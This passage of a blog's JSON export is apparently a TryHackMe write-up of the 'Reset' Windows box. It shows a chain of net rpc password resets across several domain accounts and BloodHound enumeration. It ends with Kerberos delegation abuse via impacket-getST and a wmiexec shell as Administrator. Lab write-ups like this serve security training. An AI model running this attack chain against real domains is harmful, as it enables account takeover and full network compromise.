\u250c\u2500\u2500(ishsome\u327fkali<\/span>)-<\/span>[<\/span>~\/THM\/Windows-Boxes\/Reset<\/span>]<\/span><\/span>\n\u2514\u2500$<\/span> <\/span>net<\/span> <\/span>rpc<\/span> <\/span>password<\/span> <\/span>"<\/span>SHAWNA_BRAY<\/span>"<\/span> <\/span>"<\/span>Resetme123@<\/span>"<\/span> <\/span>-U<\/span> <\/span>"<\/span>thm.corp<\/span>"<\/span>\/<\/span>"<\/span>TABATHA_BRITT<\/span>"<\/span>%<\/span>"<\/span>marxxxxxx)<\/span>"<\/span> <\/span>-S<\/span> <\/span>"<\/span>10.10.52.38<\/span>"<\/span><\/span>\n                                                                                                                                                                                                               <\/span><\/span>\n\u250c\u2500\u2500(ishsome\u327fkali<\/span>)-<\/span>[<\/span>~\/THM\/Windows-Boxes\/Reset<\/span>]<\/span><\/span>\n\u2514\u2500$<\/span> <\/span>net<\/span> <\/span>rpc<\/span> <\/span>password<\/span> <\/span>"<\/span>CRUZ_HALL<\/span>"<\/span> <\/span>"<\/span>Resetme456@<\/span>"<\/span> <\/span>-U<\/span> <\/span>"<\/span>thm.corp<\/span>"<\/span>\/<\/span>"<\/span>SHAWNA_BRAY<\/span>"<\/span>%<\/span>"<\/span>Resetme123@<\/span>"<\/span> <\/span>-S<\/span> <\/span>"<\/span>10.10.52.38<\/span>"<\/span><\/span>\n                                                                                                             <\/span><\/span>\n\u250c\u2500\u2500(ishsome\u327fkali<\/span>)-<\/span>[<\/span>~\/THM\/Windows-Boxes\/Reset<\/span>]<\/span><\/span>\n\u2514\u2500$<\/span> <\/span>net<\/span> <\/span>rpc<\/span> <\/span>password<\/span> <\/span>"<\/span>DARLA_WINTERS<\/span>"<\/span> <\/span>"<\/span>Resetme789@<\/span>"<\/span> <\/span>-U<\/span> <\/span>"<\/span>thm.corp<\/span>"<\/span>\/<\/span>"<\/span>CRUZ_HALL<\/span>"<\/span>%<\/span>"<\/span>Resetme456@<\/span>"<\/span> <\/span>-S<\/span> <\/span>"<\/span>10.10.52.38<\/span>"<\/span><\/span>\n<\/span><\/code><\/pre><\/div>\n\n\n\n
<\/div>\n\n\n\n
Finally, we can test if the password has been changed by trying to authenticate via SMB.<\/p>\n\n\n\n
<\/div>\n\n\n\n
<\/circle><\/circle><\/circle><\/g><\/svg><\/span><\/path><\/path><\/svg><\/span>
\u250c\u2500\u2500(ishsome\u327fkali<\/span>)-<\/span>[<\/span>~\/THM\/Windows-Boxes\/Reset\/BloodHound<\/span>]<\/span><\/span>\n\u2514\u2500$<\/span> <\/span>crackmapexec<\/span> <\/span>smb<\/span> <\/span>10.10<\/span>.52.38<\/span> <\/span>-u<\/span> <\/span>DARLA_WINTERS<\/span> <\/span>-p<\/span> <\/span>'<\/span>Resetme789@<\/span>'<\/span><\/span>\nSMB<\/span>         <\/span>10.10<\/span>.52.38<\/span>     <\/span>445<\/span>    <\/span>HAYSTACK<\/span>         [*] Windows 10.0 Build 17763 x64 <\/span>(<\/span>name:HAYSTACK<\/span>)<\/span> <\/span>(<\/span>domain:thm.corp<\/span>)<\/span> <\/span>(<\/span>signing:True<\/span>)<\/span> <\/span>(<\/span>SMBv1:False<\/span>)<\/span><\/span>\nSMB<\/span>         <\/span>10.10<\/span>.52.38<\/span>     <\/span>445<\/span>    <\/span>HAYSTACK<\/span>         [+] thm.corp\\DARLA_WINTERS:Resetme789@ <\/span><\/span>\n<\/span><\/code><\/pre><\/div>\n\n\n\n
Great! It worked!<\/p>\n\n\n\n
We can run BloodHound again, but this time we will use DARLA_WINTERS<\/mark><\/strong> credentials. This will give us more insight into the privileges\/rights Darla has and may be an easy way to privilege escalate as an Administrator.<\/p>\n\n\n\n
<\/div>\n\n\n\n
<\/circle><\/circle><\/circle><\/g><\/svg><\/span><\/path><\/path><\/svg><\/span>
\u250c\u2500\u2500(ishsome\u327fkali<\/span>)-<\/span>[<\/span>~\/THM\/Windows-Boxes\/Reset\/Darla_Winters<\/span>]<\/span><\/span>\n\u2514\u2500$<\/span> <\/span>bloodhound-python<\/span> <\/span>-d<\/span> <\/span>thm.corp<\/span> <\/span>-u<\/span> <\/span>DARLA_WINTERS<\/span> <\/span>-p<\/span> <\/span>'<\/span>Resetme789@<\/span>'<\/span> <\/span>-ns<\/span> <\/span>10.10<\/span>.52.38<\/span> <\/span>-c<\/span> <\/span>all<\/span><\/span>\nINFO:<\/span> <\/span>Found<\/span> <\/span>AD<\/span> <\/span>domain:<\/span> <\/span>thm.corp<\/span><\/span>\nINFO:<\/span> <\/span>Getting<\/span> <\/span>TGT<\/span> <\/span>for<\/span> <\/span>user<\/span><\/span>\nINFO:<\/span> <\/span>Connecting<\/span> <\/span>to<\/span> <\/span>LDAP<\/span> <\/span>server:<\/span> <\/span>haystack.thm.corp<\/span><\/span>\nINFO:<\/span> <\/span>Found<\/span> <\/span>1<\/span> <\/span>domains<\/span><\/span>\nINFO:<\/span> <\/span>Found<\/span> <\/span>1<\/span> <\/span>domains<\/span> <\/span>in<\/span> <\/span>the<\/span> <\/span>forest<\/span><\/span>\nINFO:<\/span> <\/span>Found<\/span> <\/span>1<\/span> <\/span>computers<\/span><\/span>\nINFO:<\/span> <\/span>Connecting<\/span> <\/span>to<\/span> <\/span>LDAP<\/span> <\/span>server:<\/span> <\/span>haystack.thm.corp<\/span><\/span>\nINFO:<\/span> <\/span>Found<\/span> <\/span>42<\/span> <\/span>users<\/span><\/span>\nINFO:<\/span> <\/span>Found<\/span> <\/span>55<\/span> <\/span>groups<\/span><\/span>\nINFO:<\/span> <\/span>Found<\/span> <\/span>3<\/span> <\/span>gpos<\/span><\/span>\nINFO:<\/span> <\/span>Found<\/span> <\/span>222<\/span> <\/span>ous<\/span><\/span>\nINFO:<\/span> <\/span>Found<\/span> <\/span>20<\/span> <\/span>containers<\/span><\/span>\nINFO:<\/span> <\/span>Found<\/span> <\/span>0<\/span> <\/span>trusts<\/span><\/span>\nINFO:<\/span> <\/span>Starting<\/span> <\/span>computer<\/span> <\/span>enumeration<\/span> <\/span>with<\/span> <\/span>10<\/span> <\/span>workers<\/span><\/span>\nINFO:<\/span> <\/span>Querying<\/span> <\/span>computer:<\/span> <\/span>HayStack.thm.corp<\/span><\/span>\nINFO:<\/span> <\/span>Done<\/span> <\/span>in<\/span> <\/span>01<\/span>M<\/span> <\/span>45<\/span>S<\/span><\/span>\n<\/span><\/code><\/pre><\/div>\n\n\n\n
<\/div>\n\n\n\n
After uploading the BloodHound data, we can mark DARLA_WINTERS as owned and start analyzing the database.<\/p>\n\n\n\n
An interesting thing that will pop up right away is that Darla has delegating rights.<\/p>\n\n\n\n
\n
In the Active Directory, delegation is a feature that enables specific accounts (user or computer) to impersonate other accounts to access particular services on the network.<\/p>\n<\/blockquote>\n<\/div>\n\n\n\n
<\/div>\n\n\n\n
\"\"\n\t\t\t\n\t\t\t\t\n\t\t\t<\/svg>\n\t\t<\/button><\/figure>\n\n\n\n
<\/div>\n\n\n\n
Privilege Escalation<\/mark><\/h3>\n\n\n\n
CIFS <\/mark><\/em><\/strong>or Common Internet File System is a file-sharing protocol that is mainly used to provide shared access to all the local systems to the remote files or other services like printing remotely. A CIFS client i.e. any computer of that network can read, write, edit, and even delete files from the remote server. It also can communicate with any server in the network that has been set up to communicate with the CIFS client, there are no restrictions like it will only connect with specific devices that come with it.<\/p>\n\n\n\n
Using this right, we can impersonate the Administrator<\/mark><\/em><\/strong> user on the HayStack machine.<\/p>\n\n\n\n
<\/div>\n\n\n\n
<\/circle><\/circle><\/circle><\/g><\/svg><\/span><\/path><\/path><\/svg><\/span>
\u250c\u2500\u2500(ishsome\u327fkali<\/span>)-<\/span>[<\/span>~\/THM\/Windows-Boxes\/Reset\/Darla_Winters<\/span>]<\/span><\/span>\n\u2514\u2500$<\/span> <\/span>impacket-getST<\/span> <\/span>-k<\/span> <\/span>-impersonate<\/span> <\/span>Administrator<\/span> <\/span>-spn<\/span> <\/span>cifs\/HayStack.thm.corp<\/span> <\/span>thm.corp\/DARLA_WINTERS<\/span><\/span>\nImpacket<\/span> <\/span>v0.11.0<\/span> <\/span>-<\/span> <\/span>Copyright<\/span> <\/span>2023<\/span> <\/span>Fortra<\/span><\/span>\n<\/span>\nPassword:<\/span><\/span>\n[<\/span>-<\/span>]<\/span> CCache file is not found. Skipping...<\/span><\/span>\n[*]<\/span> Getting TGT <\/span>for<\/span> user<\/span><\/span>\n[*]<\/span> Impersonating Administrator<\/span><\/span>\n[*]<\/span> \tRequesting S4U2self<\/span><\/span>\n[*]<\/span> \tRequesting S4U2Proxy<\/span><\/span>\n[*]<\/span> Saving ticket <\/span>in<\/span> Administrator.ccache<\/span><\/span>\n<\/span><\/code><\/pre><\/div>\n\n\n\n
<\/div>\n\n\n\n
We were able to get the TGT for the user and successfully impersonated the Administrator user. We can try to run wmiexec <\/mark><\/em><\/strong>and get a shell on the machine as Administrator!<\/p>\n\n\n\n
<\/div>\n\n\n\n
<\/circle><\/circle><\/circle><\/g><\/svg><\/span><\/path><\/path><\/svg><\/span>
\u250c\u2500\u2500(ishsome\u327fkali<\/span>)-<\/span>[<\/span>~\/THM\/Windows-Boxes\/Reset\/Darla_Winters<\/span>]<\/span><\/span>\n\u2514\u2500$<\/span> <\/span>export<\/span> <\/span>KRB5CCNAME=Administrator.ccache<\/span><\/span>\n                                                                                                             <\/span><\/span>\n\u250c\u2500\u2500(ishsome\u327fkali<\/span>)-<\/span>[<\/span>~\/THM\/Windows-Boxes\/Reset\/Darla_Winters<\/span>]<\/span><\/span>\n\u2514\u2500$<\/span> <\/span>wmiexec.py<\/span> <\/span>-k<\/span> <\/span>-no-pass<\/span> <\/span>Administrator@HayStack.thm.corp<\/span><\/span>\nImpacket<\/span> <\/span>v0.9.19<\/span> <\/span>-<\/span> <\/span>Copyright<\/span> <\/span>2019<\/span> <\/span>SecureAuth<\/span> <\/span>Corporation<\/span><\/span>\n<\/span>\n[*]<\/span> SMBv3.0 dialect used<\/span><\/span>\n[!]<\/span> Launching semi-interactive shell - Careful what you execute<\/span><\/span>\n[!]<\/span> Press help <\/span>for<\/span> extra shell commands<\/span><\/span>\nC:\\>whoami<\/span><\/span>\nthm\\Administrator<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n
<\/div>\n\n\n\n
<\/circle><\/circle><\/circle><\/g><\/svg><\/span><\/path><\/path><\/svg><\/span>
C:\\Users\\Administrator\\Desktop<\/span>><\/span>dir<\/span><\/span>\n Volume <\/span>in<\/span> drive C has no label.<\/span><\/span>\n Volume Serial Number is A8A4<\/span>-<\/span>C362<\/span><\/span>\n<\/span>\n Directory of C:\\Users\\Administrator\\Desktop<\/span><\/span>\n<\/span>\n07<\/span>\/<\/span>14<\/span>\/<\/span>2023<\/span>  <\/span>07<\/span>:<\/span>23<\/span> AM    <\/span><<\/span>DIR<\/span>><\/span>          .<\/span><\/span>\n07<\/span>\/<\/span>14<\/span>\/<\/span>2023<\/span>  <\/span>07<\/span>:<\/span>23<\/span> AM    <\/span><<\/span>DIR<\/span>><\/span>          ..<\/span><\/span>\n06<\/span>\/<\/span>21<\/span>\/<\/span>2016<\/span>  <\/span>03<\/span>:<\/span>36<\/span> PM               <\/span>527<\/span> EC2 Feedback.website<\/span><\/span>\n06<\/span>\/<\/span>21<\/span>\/<\/span>2016<\/span>  <\/span>03<\/span>:<\/span>36<\/span> PM               <\/span>554<\/span> EC2 Microsoft Windows Guide.website<\/span><\/span>\n06<\/span>\/<\/span>16<\/span>\/<\/span>2023<\/span>  <\/span>04<\/span>:<\/span>37<\/span> PM                <\/span>30<\/span> root.txt<\/span><\/span>\n               <\/span>3<\/span> File<\/span>(<\/span>s<\/span>)<\/span>          <\/span>1<\/span>,<\/span>111<\/span> bytes<\/span><\/span>\n               <\/span>2<\/span> Dir<\/span>(<\/span>s<\/span>)<\/span>  <\/span>12<\/span>,<\/span>381<\/span>,<\/span>659<\/span>,<\/span>136<\/span> bytes free<\/span><\/span>\n<\/span><\/code><\/pre><\/div>\n\n\n\n
Conclusion<\/mark><\/h3>\n\n\n\n
This was a hard machine. It took quite a bit to figure out that the MITM attack was the way to get a foothold. After a lot of enumeration, using BloodHound multiple times, and analyzing data, we were finally able to escalate our privileges by impersonating the Administrator using a TGT ticket.<\/p>\n\n\n\n
Please let me know if your approach was different while solving the box. I would like to hear if there were any easy ways that I missed. If you have any questions, feel free to ask by leaving a comment on the post. Thanks for reading \ud83d\ude42<\/p>\n","protected":false},"excerpt":{"rendered":"
Reset is a Windows machine that is part of a domain and consists of many misconfigurations. Our goal is to perform a Pentest as a Red Teamer and exploit the misconfigurations to become the Administrator on the machine. We will begin our enumeration with NMAP as usual. NMAP We will begin with enumerating SMB. The […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"om_disable_all_campaigns":false,"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"_uf_show_specific_survey":0,"_uf_disable_surveys":false,"_jetpack_newsletter_access":"","_jetpack_dont_email_post_to_subs":false,"_jetpack_newsletter_tier_id":0,"_jetpack_memberships_contains_paywalled_content":false,"_jetpack_memberships_contains_paid_content":false,"footnotes":""},"categories":[1,49,11,13,12],"tags":[],"class_list":["post-359","post","type-post","status-publish","format-standard","hentry","category-blog","category-ctf","category-ctf-write-ups","category-linux","category-tryhackme"],"aioseo_notices":[],"featured_image_src":null,"author_info":{"display_name":"ishsome","author_link":"https:\/\/blog.ishsome.com\/index.php\/author\/e5c77740144cd4a8\/"},"jetpack_featured_media_url":"","jetpack-related-posts":[{"id":103,"url":"https:\/\/blog.ishsome.com\/index.php\/2024\/01\/24\/tryhackme-umbrella\/","url_meta":{"origin":359,"position":0},"title":"TryHackMe: Umbrella","author":"ishsome","date":"January 24, 2024","format":false,"excerpt":"Umbrella from TryHackMe is a Linux machine with multiple misconfigurations. To get a foothold, we need to perform enumeration on the Docker Registry and obtain credentials for the MySQL database. By accessing the DB, we can get usernames and passwords for multiple users to log in to a webpage and\u2026","rel":"","context":"In "Blog"","block_context":{"text":"Blog","link":"https:\/\/blog.ishsome.com\/index.php\/category\/blog\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/umbrella.png?resize=350%2C200&ssl=1","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/umbrella.png?resize=350%2C200&ssl=1 1x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/umbrella.png?resize=525%2C300&ssl=1 1.5x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/umbrella.png?resize=700%2C400&ssl=1 2x"},"classes":[]},{"id":422,"url":"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/05\/tryhackme-kitty\/","url_meta":{"origin":359,"position":1},"title":"TryHackMe: Kitty","author":"ishsome","date":"February 5, 2024","format":false,"excerpt":"Kitty from TryHackMe is a Linux machine running a web application with security vulnerabilities. We are tasked with finding the vulnerabilities and exploiting them to gain root privileges on the machine. NMAP We have only two ports open 22 for SSH and HTTP port 80. \u250c\u2500\u2500(ishsome\u327fkali)-[~\/THM\/Linux-Boxes\/Kitty] \u2514\u2500$ nmap -p22,80 10.10.113.181\u2026","rel":"","context":"In "Blog"","block_context":{"text":"Blog","link":"https:\/\/blog.ishsome.com\/index.php\/category\/blog\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-18.png?resize=350%2C200&ssl=1","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-18.png?resize=350%2C200&ssl=1 1x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-18.png?resize=525%2C300&ssl=1 1.5x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-18.png?resize=700%2C400&ssl=1 2x"},"classes":[]},{"id":447,"url":"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/","url_meta":{"origin":359,"position":2},"title":"TryHackMe: Red Team Capstone Challenge","author":"ishsome","date":"February 18, 2024","format":false,"excerpt":"The Red Team Capstone challenge from TryHackMe is an in-depth network challenge simulating a Red Teaming engagement. The challenge includes several phases structured around the cyber kill chain that will require you to enumerate a perimeter, breach the organization, perform lateral movement, and finally perform goal execution to show impact.\u2026","rel":"","context":"In "Active Directory"","block_context":{"text":"Active Directory","link":"https:\/\/blog.ishsome.com\/index.php\/category\/active-directory\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/e-citizen.png?resize=350%2C200&ssl=1","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/e-citizen.png?resize=350%2C200&ssl=1 1x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/e-citizen.png?resize=525%2C300&ssl=1 1.5x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/e-citizen.png?resize=700%2C400&ssl=1 2x"},"classes":[]},{"id":168,"url":"https:\/\/blog.ishsome.com\/index.php\/2024\/01\/24\/tryhackme-bulletproof-penguin\/","url_meta":{"origin":359,"position":3},"title":"TryHackMe: Bulletproof Penguin","author":"ishsome","date":"January 24, 2024","format":false,"excerpt":"Bulletproof plugin\u00a0is an easy room that deals with hardening security on the common services that run on a Linux machine. This room covers services such as FTP, MySQL, Redis, SSH, etc., and how their configurations can be changed to secure them from unauthorized access. Our goal in each task is\u2026","rel":"","context":"In "Blog"","block_context":{"text":"Blog","link":"https:\/\/blog.ishsome.com\/index.php\/category\/blog\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-32.png?resize=350%2C200&ssl=1","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-32.png?resize=350%2C200&ssl=1 1x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-32.png?resize=525%2C300&ssl=1 1.5x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-32.png?resize=700%2C400&ssl=1 2x"},"classes":[]},{"id":625,"url":"https:\/\/blog.ishsome.com\/index.php\/2024\/05\/09\/cve-2023-33831\/","url_meta":{"origin":359,"position":4},"title":"CVE-2023-33831","author":"ishsome","date":"May 9, 2024","format":false,"excerpt":"This vulnerability allowed remote command execution (RCE) vulnerability in the \/api\/runscript endpoint of FUXA 1.1.13 allows attackers to execute arbitrary commands via a crafted POST request. This is due to lack of control or sanitization on inputs that can be controlled by users, thus allowing the use of dangerous methods\u2026","rel":"","context":"In "Blog"","block_context":{"text":"Blog","link":"https:\/\/blog.ishsome.com\/index.php\/category\/blog\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/05\/image.png?resize=350%2C200&ssl=1","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/05\/image.png?resize=350%2C200&ssl=1 1x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/05\/image.png?resize=525%2C300&ssl=1 1.5x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/05\/image.png?resize=700%2C400&ssl=1 2x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/05\/image.png?resize=1050%2C600&ssl=1 3x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/05\/image.png?resize=1400%2C800&ssl=1 4x"},"classes":[]},{"id":414,"url":"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/01\/gitlab-cve-2023-7028\/","url_meta":{"origin":359,"position":5},"title":"GitLab CVE-2023-7028","author":"ishsome","date":"February 1, 2024","format":false,"excerpt":"This blog is based on TryHackMe's room on GitLab CVE-2023-7028. Learning Objectives Exploit a GitLab CE instance through CVE 2023-7028 How the exploit works Protection and mitigation measures What is GitLab? GitLab is a renowned and widely adopted web-based repository manager that provides a comprehensive platform for source code management,\u2026","rel":"","context":"In "Blog"","block_context":{"text":"Blog","link":"https:\/\/blog.ishsome.com\/index.php\/category\/blog\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-1.png?resize=350%2C200&ssl=1","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-1.png?resize=350%2C200&ssl=1 1x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-1.png?resize=525%2C300&ssl=1 1.5x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-1.png?resize=700%2C400&ssl=1 2x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-1.png?resize=1050%2C600&ssl=1 3x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-1.png?resize=1400%2C800&ssl=1 4x"},"classes":[]}],"jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/blog.ishsome.com\/index.php\/wp-json\/wp\/v2\/posts\/359","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/blog.ishsome.com\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blog.ishsome.com\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blog.ishsome.com\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/blog.ishsome.com\/index.php\/wp-json\/wp\/v2\/comments?post=359"}],"version-history":[{"count":11,"href":"https:\/\/blog.ishsome.com\/index.php\/wp-json\/wp\/v2\/posts\/359\/revisions"}],"predecessor-version":[{"id":393,"href":"https:\/\/blog.ishsome.com\/index.php\/wp-json\/wp\/v2\/posts\/359\/revisions\/393"}],"wp:attachment":[{"href":"https:\/\/blog.ishsome.com\/index.php\/wp-json\/wp\/v2\/media?parent=359"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blog.ishsome.com\/index.php\/wp-json\/wp\/v2\/categories?post=359"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blog.ishsome.com\/index.php\/wp-json\/wp\/v2\/tags?post=359"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}